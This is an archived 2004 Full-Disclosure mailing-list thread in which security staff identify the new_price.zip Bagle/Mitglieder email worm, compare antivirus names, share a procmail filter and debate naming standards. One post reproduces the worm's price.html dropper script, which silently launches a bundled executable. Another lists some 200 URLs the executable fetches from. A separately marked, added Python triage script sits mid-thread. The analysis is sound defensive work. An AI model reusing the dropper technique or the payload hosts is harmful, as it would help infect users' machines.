Mailing List Archive: Full Disclosure: Full-Disclosure

(no subject)

 

 



joe at joesmith
Aug 9, 2004, 12:49 PM
Post #51 of 181
Re: (no subject)

Kaspersky detects it as I-Worm.Bagle.al

Todd Towles wrote:

>I am seeing a lot of them too. Just had a call from my e-mail people. I have
>one that is new_price.zip (5KB)
>
>There appears to be some people on FD that are infected and we are getting a
>lot on my end.
>
>-----Original Message-----
>From: full-disclosure-admin [at] lists
>[mailto:full-disclosure-admin [at] lists] On Behalf Of Jonathan
>Grotegut
>Sent: Monday, August 09, 2004 2:04 PM
>To: Full-disclosure
>Subject: RE: [Full-Disclosure] (no subject)
>
>(In regards to new_price.zip file attachment)
>
>Anyone have any idea what this is, we had some clients just get pretty
>hard with this email. I am unable to find anything on it, from my VERY
>Limited knowledge it appears to be a virus exploiting one of the many
>holes in IE. Anyone else see anything on this yet?
>
>Jonathan Grotegut
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


mike at erdelynet
Aug 9, 2004, 1:07 PM
Post #52 of 181
Re: (no subject)

ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today.

From ClamAV Update list:
Submission: 5025-web, 5026-web, 5027-web, 5028-web, 5029-web, 5030-web,
5043-web, 5044-web,
5045-web, 5046-web, 5047-web, 5048-web
Sender: James Stevens, Bill Landry, Henning Spjelkavik, Melanie
Dussiaume, Roman Scheucher, Gunter
Mintzel, Mike Watterson, Martin, Rob Kudyba, wojciech myszka, Philip
Corliss, Kevin Way
Virus: unknown, JS/IllWill (McAfee), JS.Dword.dropper (Bitdefender),
JScript/IE.VM.Exploit (Inoculate)
Alias: TR/RunMe.Dldr.1 (Hbedv)
Added: Trojan.JS.RunMe
Added: Trojan.RunMe
Note: The name may change.
Note: There are more submissions with this; at the moment I'm publishing
just some of them.

-Mike

Jonathan Grotegut wrote:

> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>



toddtowles at brookshires
Aug 9, 2004, 1:08 PM
Post #53 of 181
RE: (no subject)

It appears to be what Trend Micro calls Beagle.AC - IDE released at 2:30pm

Maybe it is dropping an older Trojan.

-----Original Message-----
From: Paul Szabo [mailto:psz [at] maths]
Sent: Monday, August 09, 2004 3:06 PM
To: jgrotegut [at] directpointe; toddtowles [at] brookshires
Subject: RE: [Full-Disclosure] (no subject)

> Anyone have any idea what this is ...

F-PROT ANTIVIRUS
Program version: 4.4.2
Engine version: 3.14.11

VIRUS SIGNATURE FILES
SIGN.DEF created 9 August 2004
SIGN2.DEF created 9 August 2004
MACRO.DEF created 10 May 2004

message->new__price.zip->price.html Infection: HTML/ObjData@ex
message->new__price.zip->price/price.exe is a dropper for W32/Mitglieder.W

Cheers,

Paul Szabo - psz [at] maths http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia



sjohnston at cavionplus
Aug 9, 2004, 1:10 PM
Post #54 of 181
RE: (no subject)

I started seeing this earlier. No news from Norton that I can see.

I'm trying to figure out what it does...


Shannon Johnston



On Mon, 2004-08-09 at 13:03, Jonathan Grotegut wrote:
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>
--
Shannon Johnston <sjohnston [at] cavionplus>
Cavion Plus


daveFD at davewking
Aug 9, 2004, 1:12 PM
Post #55 of 181
Re: (no subject)

F-Secure is reporting it as Bagle.AL. Looks like it's your basic email
virus with a trojan backdoor.
http://www.f-secure.com/v-descs/bagle_al.shtml

Dave King,
http://www.thesecure.net

Jonathan Grotegut wrote:

>(In regards to new_price.zip file attachment)
>
>Anyone have any idea what this is, we had some clients just get pretty
>hard with this email. I am unable to find anything on it, from my VERY
>Limited knowledge it appears to be a virus exploiting one of the many
>holes in IE. Anyone else see anything on this yet?
>
>Jonathan Grotegut
>




eric at arcticbears
Aug 9, 2004, 1:13 PM
Post #56 of 181
RE: (no subject)

On Mon, August 9, 2004 12:03 pm, Jonathan Grotegut said:
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?

I've seen several dozen of them today... getting pretty annoying. No other
info, though. :|

-Eric

--
arctic bears - email and dns services
http://www.arcticbears.com



Michael.Poulin at mascocs
Aug 9, 2004, 1:14 PM
Post #57 of 181
RE: (no subject)

F-Secure is saying that this is a new variant of Bagle.
http://www.f-secure.com/weblog/

Michael Poulin

-----Original Message-----
From: full-disclosure-admin [at] lists
[mailto:full-disclosure-admin [at] lists] On Behalf Of Jonathan
Grotegut
Sent: Monday, August 09, 2004 3:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)

Anyone have any idea what this is, we had some clients just get pretty
hard with this email. I am unable to find anything on it, from my VERY
Limited knowledge it appears to be a virus exploiting one of the many
holes in IE. Anyone else see anything on this yet?

Jonathan Grotegut



mike-full at Megaglobal
Aug 9, 2004, 1:24 PM
Post #58 of 181
Re: (no subject)

List of URLs embedded within a price.exe I received.


-M.

http://polobeer.de/2.jpg
http://r2626r.de/2.jpg
http://kooltokyo.ru/2.jpg
http://mmag.ru/2.jpg
http://advm1.gm.fh-koeln.de/2.jpg
http://evadia.ru/2.jpg
http://megion.ru/2.jpg
http://molinero-berlin.de/2.jpg
http://dozenten.f1.fhtw-berlin.de/2.jpg
http://shadkhan.ru/2.jpg
http://sacred.ru/2.jpg
http://kypexin.ru/2.jpg
http://www.gantke-net.com/2.jpg
http://www.mcschnaeppchen.com/2.jpg
http://www.rollenspielzirkel.de/2.jpg
http://134.102.228.45/2.jpg
http://196.12.49.27/2.jpg
http://aus-Zeit.com/2.jpg
http://lottery.h11.ru/2.jpg
http://herzog.cs.uni-magdeburg.de/2.jpg
http://yaguark.h10.ru/2.jpg
http://213.188.129.72/2.jpg
http://thorpedo.us/2.jpg
http://szm.sk/2.jpg
http://lars-s.privat.t-online.de/2.jpg
http://www.no-abi2003.de/2.jpg
http://www.mdmedia.org/2.jpg
http://abi-2004.org/2.jpg
http://sovea.de/2.jpg
http://www.porta.de/2.jpg
http://matzlinger.com/2.jpg
http://pocono.ru/2.jpg
http://controltechniques.ru/2.jpg
http://alexey.pioneers.com.ru/2.jpg
http://momentum.ru/2.jpg
http://omegat.ru/2.jpg
http://www.perfectgirls.net/2.jpg
http://porno-mania.net/2.jpg
http://colleen.ai.net/2.jpg
http://ourcj.com/2.jpg
http://free.bestialityhost.com/2.jpg
http://slavarik.ru/2.jpg
http://burn2k.ipupdater.com/2.jpg
http://carabi.ru/2.jpg
http://spbbook.ru/2.jpg
http://binn.ru/2.jpg
http://sbuilder.ru/2.jpg
http://protek.ru/2.jpg
http://www.PlayGround.ru/2.jpg
http://celine.artics.ru/2.jpg
http://www.artics.ru/2.jpg
http://www.laserbuild.ru/2.jpg
http://www.lamatec.com/2.jpg
http://www.sensi.com/2.jpg
http://www.oldtownradio.com/2.jpg
http://www.youbuynow.com/2.jpg
http://64.62.172.118/2.jpg
http://www.tayles.com/2.jpg
http://dodgetheatre.com/2.jpg
http://www.thepositivesideofsports.com/2.jpg
http://www.bridesinrussia.com/2.jpg
http://fairy.dataforce.net/2.jpg
http://www.pakwerk.ru/2.jpg
http://home.profootball.ru/2.jpg
http://www.ankil.ru/2.jpg
http://www.ddosers.net/2.jpg
http://tarkosale.net/2.jpg
http://www.boglen.com/2.jpg
http://change.east.ru/2.jpg
http://www.teatr-estrada.ru/2.jpg
http://www.glass-master.ru/2.jpg
http://www.zeiss.ru/2.jpg
http://www.sposob.ru/2.jpg
http://www.glavriba.ru/2.jpg
http://alfinternational.ru/2.jpg
http://euroviolence.com/2.jpg
http://www.webronet.com/2.jpg
http://www.virtmemb.com/2.jpg
http://www.infognt.com/2.jpg
http://www.vivamedia.ru/2.jpg
http://www.zelnet.ru/2.jpg
http://www.dsmedia.ru/2.jpg
http://www.vendex.ru/2.jpg
http://www.elit-line.ru/2.jpg
http://pixel.co.il/2.jpg
http://www.milm.ru/2.jpg
http://dev.tikls.net/2.jpg
http://www.met.pl/2.jpg
http://www.strefa.pl/2.jpg
http://kafka.punkt.pl/2.jpg
http://www.rubikon.pl/2.jpg
http://www.neostrada.pl/2.jpg
http://werel1.web-gratis.net/2.jpg
http://www.tuhart.net/2.jpg
http://www.antykoncepcja.net/2.jpg
http://www.dami.com.pl/2.jpg
http://vip.pnet.pl/2.jpg
http://www.webzdarma.cz/2.jpg
http://emnesty.w.interia.pl/2.jpg
http://niebo.net/2.jpg
http://strony.wp.pl/2.jpg
http://sec.polbox.pl/2.jpg
http://www.phg.pl/2.jpg
http://emnezz.e-mania.pl/2.jpg
http://www.republika.pl/2.jpg
http://www.silesianet.pl/2.jpg
http://www.republika.pl/2.jpg
http://tdi-router.opola.pl/2.jpg
http://republika.pl/2.jpg
http://infokom.pl/2.jpg
http://silesianet.pl/2.jpg
http://terramail.pl/2.jpg
http://silesianet.pl/2.jpg
http://www.iluminati.kicks-ass.net/2.jpg
http://www.dilver.ru/2.jpg
http://www.yarcity.ru/2.jpg
http://www.scli.ru/2.jpg
http://www.elemental.ru/2.jpg
http://diablo.homelinux.com/2.jpg
http://www.interrybflot.ru/2.jpg
http://www.webpark.pl/2.jpg
http://www.rafani.cz/2.jpg
http://gutemine.wu-wien.ac.at/2.jpg
http://przeglad-tygodnik.pl/2.jpg
http://przeglad-tygodnik.pl/2.jpg
http://pb195.slupsk.sdi.tpnet.pl/2.jpg
http://www.ciachoo.pl/2.jpg
http://cavalierland.5u.com/2.jpg
http://www.nefkom.net/2.jpg
http://rausis.latnet.lv/2.jpg
http://www.hgr.de/2.jpg
http://www.airnav.com/2.jpg
http://www.astoria-stuttgart.de/2.jpg
http://ultimate-best-hgh.0my.net/2.jpg
http://wynnsjammer.proboards18.com/2.jpg
http://www.jewishgen.org/2.jpg
http://www.hack-gegen-rechts.com/2.jpg
http://host.wallstreetcity.com/2.jpg
http://quotes.barchart.com/2.jpg
http://www.aannemers-nederland.nl/2.jpg
http://www.sjgreatdeals.com/2.jpg
http://financial.washingtonpost.com/2.jpg
http://www.biratnagarmun.org.np/2.jpg
http://hsr.zhp.org.pl/2.jpg
http://traveldeals.sidestep.com/2.jpg
http://www.hbz-nrw.de/2.jpg
http://www.ifa-guide.co.uk/2.jpg
http://www.inversorlatino.com/2.jpg
http://www.zhp.gdynia.pl/2.jpg
http://host.businessweek.com/2.jpg
http://packages.debian.or.jp/2.jpg
http://www.math.kobe-u.ac.jp/2.jpg
http://www.k2kapital.com/2.jpg
http://www.tanzen-in-sh.de/2.jpg
http://www.wapf.com/2.jpg
http://www.hgrstrailer.com/2.jpg
http://www.forbes.com/2.jpg
http://www.oshweb.com/2.jpg
http://www.rumbgeo.ru/2.jpg
http://www.dicto.ru/2.jpg
http://www.busheron.ru/2.jpg
http://www.omnicom.ru/2.jpg
http://www.teleline.ru/2.jpg
http://www.dynex.ru/2.jpg
http://www.gamma.vyborg.ru/2.jpg
http://nominal.kaliningrad.ru/2.jpg
http://www.baltmatours.com/2.jpg
http://www.interfoodtd.ru/2.jpg
http://www.baltnet.ru/2.jpg
http://www.neprifan.ru/2.jpg
http://photo.gornet.ru/2.jpg
http://www.aktor.ru/2.jpg
http://catalog.zelnet.ru/2.jpg
http://www.sdsauto.ru/2.jpg
http://www.gradinter.ru/2.jpg
http://www.avant.ru/2.jpg
http://www.porsa.ru/2.jpg
http://www.taom-clan.de/2.jpg
http://www.perfectjewel.com/2.jpg
http://www.vrack.net/2.jpg
http://www.netradar.com/2.jpg
http://www.pgipearls.com/2.jpg
http://www.vconsole.net/2.jpg
http://www.ccbootcamp.com/2.jpg
http://host23.ipowerweb.com/2.jpg
http://www.timelessimages.com/2.jpg
http://www.peterstar.ru/2.jpg
http://www.5100.ru/2.jpg
http://www.gin.ru/2.jpg
http://www.rweb.ru/2.jpg
http://www.metacenter.ru/2.jpg
http://www.biysk.ru/2.jpg
http://www.free-time.ru/2.jpg
http://www.rastt.ru/2.jpg
http://www.chelny.ru/2.jpg
http://www.chat4adult.com/2.jpg
http://www.landofcash.net/2.jpg
http://relay.great.ru/2.jpg
http://www.kefaloniaresorts.com/2.jpg
http://www.epski.gr/2.jpg
http://www.myrtoscorp.com/2.jpg
http://www.aphel.de/2.jpg
http://www.intellect.lvc/2.jpg
http://www.abcdesign.ru/2.jpg


--
.. Michael Jastremski ....
.. Network Systems Engineer ..
.. www.oldtimeynerd.net ...........
.. www.openphoto.net ...




rskehr at ucdavis
Aug 9, 2004, 1:59 PM
Post #59 of 181
Re: (no subject)

Symantec identifies this as W32.Beagle.AO@m

-Bob Kehr

Jonathan Grotegut wrote:

> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>



Stephen.Agar at bmhcc
Aug 9, 2004, 2:03 PM
Post #60 of 181
RE: (no subject)

> -----Original Message-----
> From: full-disclosure-admin [at] lists
> [mailto:full-disclosure-admin [at] lists] On Behalf Of Michael
> Sent: Monday, August 09, 2004 3:25 PM
> To: Jonathan Grotegut
> Cc: Full-disclosure
> Subject: Re: [Full-Disclosure] (no subject)
>
>
> List of URLs embedded within a price.exe i recieved.
>
>
> -M.
<snip>

All of this is located on the SANS Internet Storm Center site. Bernard
linked to it in his response. http://www.incidents.org



michealespinola at gmail
Aug 9, 2004, 2:05 PM
Post #61 of 181
Re: (no subject)

This Symantec Rapid Release beta will catch it for NAV users, until
they roll out the next official .def file:

<ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe>


On Mon, 9 Aug 2004 14:32:14 -0500, Todd Towles
<toddtowles [at] brookshires> wrote:
> I am seeing a lot of them too. Just had a call from my e-mail people. I have
> one that is new_price.zip (5KB)
>
> There appears to be some people on FD that are infected and we are getting a
> lot on my end.
>
>
>
> -----Original Message-----
> From: full-disclosure-admin [at] lists
> [mailto:full-disclosure-admin [at] lists] On Behalf Of Jonathan
> Grotegut
> Sent: Monday, August 09, 2004 2:04 PM
> To: Full-disclosure
> Subject: RE: [Full-Disclosure] (no subject)
>
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>


--
-Micheal



tremaine at gmail
Aug 9, 2004, 2:29 PM
Post #62 of 181
Re: (no subject)

On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut
<jgrotegut [at] directpointe> wrote:
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut


Bagle.aq with Mitglieder-like dropper

Procmail recipe (courtesy of offlist associate), use at your own risk.
[code]
# Score-based filter: the recipe starts at -1000 and every matching
# condition adds 300, so at least four of the five strings must appear
# in the message body (B = scan the body, D = case-sensitive match)
# before the score goes positive and the mail is dropped.
:0 BD
* -1000^0
* 300^0 YJuA6wS8WsBr
* 300^0 zGzjbJDCLB96
* 300^0 BOSKHdXH8Blw
* 300^0 dEi3loqk64su
* 300^0 byusWle0odyf
/dev/null
[/code]


price.html file included in the zip:
[code]
<head>
<script language="JavaScript">
// Path of the executable packaged next to this HTML inside the zip
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
// Only Win32 targets get the executable
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
// IE: a 1x1 <object> whose codebase points at the bundled .exe, so the
// browser fetches it as the "install" for the given classid
document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else if (bname == 'Netscape' && bver >= 4) {
// Netscape: try the SmartUpdate trigger, otherwise navigate to the .exe
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
// Any other browser: navigate straight to the .exe
location.replace(exepath);
}
}

install();

// -->
</script>
</head>
[/code]




Definitions available on McAfee and Trend Micro, and it appears
Symantec should have something by about 6pm.



--
Tremaine
IT Security Consultant

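An added example, not code from the thread or from any AV vendor: a small Python triage script for an attachment laid out the way the posts above describe (price.html next to price/price.exe in one zip). It flags HTML that hands an executable from the same archive to an <object codebase=...> or to location.replace(), the trick in the posted price.html, and it lists the http:// URLs embedded in that executable, the way the URL list earlier in the thread was produced. The executable bytes are a constructed stand-in (an "MZ" header plus padding), and the URLs inside it use documentation addresses (203.0.113.7, www.example.net), not the real sample's list.

```python
import io
import re
import zipfile

# Posted price.html, trimmed to the IE and fallback branches; the classid
# line is rejoined where the mail wrapped it.
PRICE_HTML = """<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>
<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
function install() {
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else {
location.replace(exepath);
}
}
install();
// -->
</script>
</head>
"""

# Quoted string literals ending in .exe, e.g. var exepath='price/price.exe'
EXE_LITERAL = re.compile(r"""['"]([^'"\s]+\.exe)['"]""", re.I)
# http(s) URLs inside a binary; stops at whitespace, NUL or HTML delimiters
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\x00<>\"']*)?")


def html_launch_targets(html):
    """Return (exe paths the HTML names, launch vectors it uses)."""
    vectors = []
    if re.search(r"<object\b", html, re.I) and re.search(r"\bcodebase\s*=", html, re.I):
        vectors.append("object-codebase")
    if "location.replace(" in html:
        vectors.append("location-redirect")
    targets = sorted({m.group(1).lstrip("./") for m in EXE_LITERAL.finditer(html)})
    return targets, vectors


def urls_in_binary(data):
    """Ordered, de-duplicated URLs found in a byte blob (strings | grep http)."""
    seen, found = set(), []
    for m in URL_RE.finditer(data):
        url = m.group(0).decode("ascii")
        if url not in seen:
            seen.add(url)
            found.append(url)
    return found


def triage_zip(zip_bytes):
    """Describe whether the archive pairs an HTML launcher with a bundled PE."""
    report = {"dropper": False, "vectors": [], "targets": [], "urls": {}}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = {n.lstrip("./"): n for n in zf.namelist()}
        for name in zf.namelist():
            if not name.lower().endswith((".htm", ".html")):
                continue
            targets, vectors = html_launch_targets(zf.read(name).decode("latin-1"))
            report["vectors"] += [v for v in vectors if v not in report["vectors"]]
            for target in targets:
                member = members.get(target)
                if member is None:            # HTML points outside the archive
                    continue
                payload = zf.read(member)
                is_pe = payload[:2] == b"MZ"  # DOS/PE header magic
                report["targets"].append((name, member, is_pe))
                report["urls"][member] = urls_in_binary(payload)
                if is_pe and vectors:
                    report["dropper"] = True
    return report


def build_sample():
    """Constructed stand-in for new_price.zip (fake PE, documentation hosts)."""
    fake_exe = (b"MZ" + b"\x90" * 64
                + b"http://203.0.113.7/2.jpg\x00"
                + b"http://www.example.net/2.jpg\x00"
                + b"http://203.0.113.7/2.jpg\x00"   # duplicate, as in the real list
                + b"\x00" * 16)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("price.html", PRICE_HTML)
        zf.writestr("price/price.exe", fake_exe)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_zip(build_sample())
    print("dropper:", result["dropper"], "via", result["vectors"])
    for html, exe, is_pe in result["targets"]:
        print(f"{html} -> {exe} (PE: {is_pe})")
        for url in result["urls"][exe]:
            print("  ", url)
```

The check is structural rather than signature-based: it fires on the pairing of an HTML launcher with an executable in the same archive, which is what survives a repack with new base64 fragments, while the procmail recipe above keys on literal strings and needs updating per variant.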


vh at helith
Aug 9, 2004, 3:42 PM
Post #63 of 181
Re: (no subject)

On Mon, 09 Aug 2004 16:07:02 -0400
Michael Erdely <mike [at] erdelynet> wrote:

> ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT
> today.
>
..
>
> -Mike

ClamAV has problems filtering the HTML e-mails.
I received about 4 infected mails even though clamscan/clamd know the virii.
Clamscan identifies the virii without problems if I scan the attachment
saved on the HDD...


vh


frank at knobbe
Aug 9, 2004, 5:06 PM
Post #64 of 181
Re: (no subject)

On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote:
> BitDefender 7.0/20040809 found [JS.Dword.dropper]
> ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
> eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
> F-Prot 3.15/20040809 found [HTML/ObjData@ex]
> Kaspersky 4.0.2.23/20040809 found nothing
> McAfee 4383/20040804 found [JS/IllWill]
> NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
> Norman 5.70.10/20040806 found [W32/Malware]
> Panda 7.02.00/20040809 found [Fichero Sospechoso]
> Sybari 7.5.1314/20040809 found [JS/IllWill]
> Symantec 8.0/20040809 found nothing
> TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]


Isn't the complete lack of naming standardization in the AV industry
simply amazing? Imagine that were the case in science, particularly
medicine...

Makes for a nice game of AV bingo though...

-Frank


nick at virus-l
Aug 9, 2004, 10:19 PM
Post #65 of 181
Re: (no subject)

The appropriately-named Frank Knobbe wrote:

> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? ...

Much as less than perfect naming coordination bothers me, the amazing
thing is actually that names are coordinated as well as they are
(though especially bad cases such as the mish-mash of mostly generic
and heuristic attempts to detect HTML-embedded vulnerability
exploitation attempts, such as the one you quoted, can certainly be
found to suggest that there is virtually no consistency at all).

Of course, outsiders throwing stones probably shouldn't be expected to
understand this.

However, if all AV vendors (and it would have to be all vendors or
market forces would prevent it happening, so guess what is one of the
largest things blocking better naming coordination?) were to agree a
name perfectly before _any_ of them shipped updated detection for new
viruses, it is a better than fair bet that those same outsiders
would then be the ones complaining longest and loudest about how tardy AV
vendors were at shipping "emergency" updates.

> ... Imagine that were the case in science, particularly
> medicine...

Or perhaps it would be better to imagine that you made a more
meaningful analogy, such as asking how well you think medicine would do
in maintaining naming consistency if entirely new strains and variants
of viruses and pathological bacteria appeared world-wide at the rate
computer malware proliferates. A little exercise of the grey cells
will likely suggest that they are unlikely to do better in the short
term (i.e. during the outbreak phase), but would probably do much
better longer-term as the diseases, outbreaks and treatments of
"biological malware" tend to last _MUCH_ longer than their "computer
cousins". If there was much ongoing need to coordinate names I think
the AV industry would do better than it does now, but with the rate at
which new variants appear being what it is, medium-term renaming and
name coordination are both problematic and (generally) seen as having
very little, if any, market value, so few people expend much effort on
such renaming.


--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



todd at hostopia
Aug 9, 2004, 11:02 PM
Post #66 of 181
Re: (no subject)

> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? Imagine that were the case in science, particularly
> medicine...

No shit. They should at least get together and come up with some common
naming convention. They need to make some common "naming authority", it's
not difficult, we do it all the time with other software and as mentioned,
in all scientific disciplines. Otherwise, things become very convoluted
for us in the know. This is irrelevant to the general population,
but is necessary for the people who have to deal with these things.

How about it "AV guys"? (I mean to be nice here...)

Todd



nick at virus-l
Aug 10, 2004, 12:10 AM
Post #67 of 181
Re: (no subject)

Todd Burroughs to Frank Knobbe:

> > Isn't the complete lack of naming standardization in the AV industry
> > simply amazing? Imagine that were the case in science, particularly
> > medicine...
>
> No shit. They should at least get together and come up with some common
> naming convention. They need to make some common "naming authority", it's
> not difficult, we do it all the time with other software and as mentioned,
> in all scientific disciplines. Otherwise, things become very convoluted
> for us in the know. This is irrelevant to the general population,
> but is necessary for the people who have to deal with these things.

Believe it or not we know, and things are being done about it.

The "scientific disciplines" and others you speak of don't have to deal
with things that happen in any and all possible combinations of as
often, as fast, polymorphically, metamorphically, combinatorially, etc
as the AV industry does _and generally_ have had several generations of
academic research to form, refine, toss out and start over, etc their
classification and naming systems. Still, I agree that we AV
researchers could do naming better but there is not sufficient external
pressure to force the industry to try to do a better job of naming than
it currently does so it has no reason to "do the hard yards" that any
significant improvement in naming consistency will require...

> How about it "AV guys"? (I mean to be nice here...)

Other than a few voices wailing within the industry, there are some
much larger scale moves afoot that just may change the "there is not
sufficient external pressure" factor I mentioned above, though
realistically these moves may take years rather than months to produce
significant improvement, but they are a start...


Regards,

Nick FitzGerald



tcleary2 at csc
Aug 10, 2004, 12:38 AM
Post #68 of 181
Re: (no subject)

>> Isn't the complete lack of naming standardization in the AV industry
>> simply amazing? Imagine that were the case in science, particularly
>> medicine...
>
>No shit. They should at least get together and come up with some common
>naming convention. They need to make some common "naming authority", it's
>not difficult, we do it all the time with other software and as mentioned,
>in all scientific disciplines. Otherwise, things become very convoluted
>for us in the know. This is irrelevant to the general population,
>but is necessary for the people who have to deal with these things.

<heavy_irony>
Of course, you're making the assumption that IT Security Professionals
deserve/get the respect of having a formal "body of knowledge" recognised
by Academia and Government rather than just being a bunch of ungrateful
malcontents fulminating in the wilderness instead of knuckling down to
life as the hired hands of the Corporate Finance section like we bloody
well should, right?
</heavy_irony>

Let the flames begin. ;-)

tom.
----------------------------------------------------------------------------------------
Tom Cleary - Security Architect

CSC Perth

Tel. +61 8 9254 5345 Mobile: 0411208423

tcleary2 [at] csc

"In IT, acceptable solutions depend upon humans - Computers don't
negotiate."
----------------------------------------------------------------------------------------


Michael.Simpson at inveresk
Aug 10, 2004, 2:00 AM
Post #69 of 181
Re: (no subject)

I've worked within medicine in my previous life as an ER doc and guess
what: there is no formal naming standardisation within it, at least not one
that there is any sort of agreement over, though people have been trying for
centuries to sort something out.
Some use Latin, some use Greek, some use anglicised terms, others will use
their own language's interpretations of disease.
Google helps but the variation between differing nations' medical
terminology can lead to a total breakdown in communication when one relies
on a written record.
Also, some of the less obvious jargon is derived from the name of the
company (that owns the patent) that makes the device that's used in the
treatment of the disease.
"we threw a quick Austin-Moore into Mrs McGinty this morning"
Using impenetrable, rapidly-geographically-changing terminology is part of
the mechanism used to obfuscate the publicly available knowledge that is
part of the (evil) process of preserving professional autonomy. Not a good
thing for medics to do but it tends to be repeated in other industries as
well.
-three letter acronym anyone?




Frank Knobbe <frank [at] knobbe>
Sent by: full-disclosure-admin [at] lists
10/08/2004 01:06
To: Bernardo Quintero <bernardo [at] hispasec>
cc: full-disclosure [at] netsys
Subject: Re: [Full-Disclosure] (no subject)

On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote:
> BitDefender 7.0/20040809 found [JS.Dword.dropper]
> ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
> eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
> F-Prot 3.15/20040809 found [HTML/ObjData@ex]
> Kaspersky 4.0.2.23/20040809 found nothing
> McAfee 4383/20040804 found [JS/IllWill]
> NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
> Norman 5.70.10/20040806 found [W32/Malware]
> Panda 7.02.00/20040809 found [Fichero Sospechoso]
> Sybari 7.5.1314/20040809 found [JS/IllWill]
> Symantec 8.0/20040809 found nothing
> TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]


Isn't the complete lack of naming standardization in the AV industry
simply amazing? Imagine that were the case in science, particularly
medicine...

Makes for a nice game of AV bingo though...

-Frank
Attachments: signature.asc (0.19 KB)


Marek.Isalski at smuht

Aug 10, 2004, 5:08 AM

Post #70 of 181 (4430 views)
Permalink
Re: (no subject) [In reply to]

>>> Michael Simpson <Michael.Simpson [at] inveresk> 10/08/2004 10:00:52 >>>
> i've worked within medicine in my previous life as an ER doc and guess
> what
> there is no formal naming standardisation within it, at least not one that
> there is any sort of agreement over, though people have been trying for
> centuries to sort something out.
>
> -three letter acronym anyone?

I always find the adrenaline/epinephrine naming clash amusing and confusing. Does it stem from a company Trademarking "adrenaline" in the USA? Because, as far as I can tell, everyone uses "adrenaline" as the generic term for the hormone of the same name here in the UK.

Acronyms have their own pitfalls too... I've heard of numerous cases where a derogatory and unprofessional acronym was written on/in some medical notes (PITA, TWOT etc). Perhaps it should be standard practice that when the patient asks to have his/her medical notes explained to him/her, as s/he is quite entitled under the Data Protection Act, the member of staff writing said comment should explain its medical meaning and clinical significance.

The scary part of acronyms comes with overloading. One derogatory (and very unprofessional) acronym I've heard about from a number of years ago was "NFR", meant to stand for "Normal For Ridgehill" (a region with which the local hospital had some "experience").

NFR is more commonly used as an abbreviation for: Not For Resuscitation; from what I understand, NFR is a quite detailed set of circumstances, changing on a frequent basis, stipulating when somebody does not need resuscitation, i.e. are already beyond medical help.

[.disclaimer: i'm not a medic, so any corrections will be educational for me too!]

Marek




Valdis.Kletnieks at vt

Aug 10, 2004, 7:47 AM

Post #71 of 181 (4410 views)
Permalink
